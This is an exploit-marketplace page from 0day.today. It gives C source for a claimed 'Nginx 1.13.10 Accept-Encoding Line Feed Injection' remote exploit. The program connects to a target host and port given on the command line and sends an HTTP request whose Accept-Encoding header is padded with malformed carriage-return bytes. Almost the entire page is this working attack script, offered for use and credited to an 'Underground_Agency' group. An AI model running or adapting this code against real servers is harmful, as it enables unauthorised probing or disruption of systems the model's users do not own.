[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit

Author
Keiliikoa Kirland
Risk
[
Security Risk High
]
0day-ID
0day-ID-30100
Category
remote exploits
Date add
02-04-2018
Platform
linux
// Underground_Agency (UA) - (koa, bacL, g3kko, Dostoyevsky)

// trigger nginx 1.13.10 (latest) logic flaw / bug
// ~2018

// Tested on Ubuntu 17.10 x86 4.13.0-21-generic

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <time.h>

int main(int argc, char **argv){
    int sockfd, ret;
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0){
        perror("socket");
        exit(EXIT_FAILURE);
    }

    struct sockaddr_in servAddr;
    memset(&servAddr, 0, sizeof(servAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(atoi(argv[2]));
    servAddr.sin_addr.s_addr = inet_addr(argv[1]);

    ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr));
    if(ret < 0){
        perror("connect");
        exit(EXIT_FAILURE);
    }

    char buf[2048];

    strcpy(buf, "GET / HTTP/1.1\r\nHost: ");
    strcat(buf, argv[1]);
    strcat(buf, "\r\n");
    strcat(buf, "Connection: close\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\n");

    char *buf2 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
                 "Accept-Encoding: gzip, deflate\r\n\rrrrr\r\r\r\r\\rr\rrrrrr" // bug
                 "Accept-Language: en-US,en;q=0.9\r\n\r\n";

    strcat(buf, buf2);

    char recvbuf[1024];

    ret = send(sockfd, buf, strlen(buf), 0);
    if(ret < 0){
        perror("send");
        exit(EXIT_FAILURE);
    }

    printf("Successfully sent data\n");

    ret = recv(sockfd, recvbuf, 1024, 0);
    if(ret < 0){
        perror("recv");
        exit(EXIT_FAILURE);
    }

    printf("Data: %s\n", recvbuf);

    close(sockfd);
    exit(EXIT_SUCCESS);
}

#  0day.today [2024-03-28]  #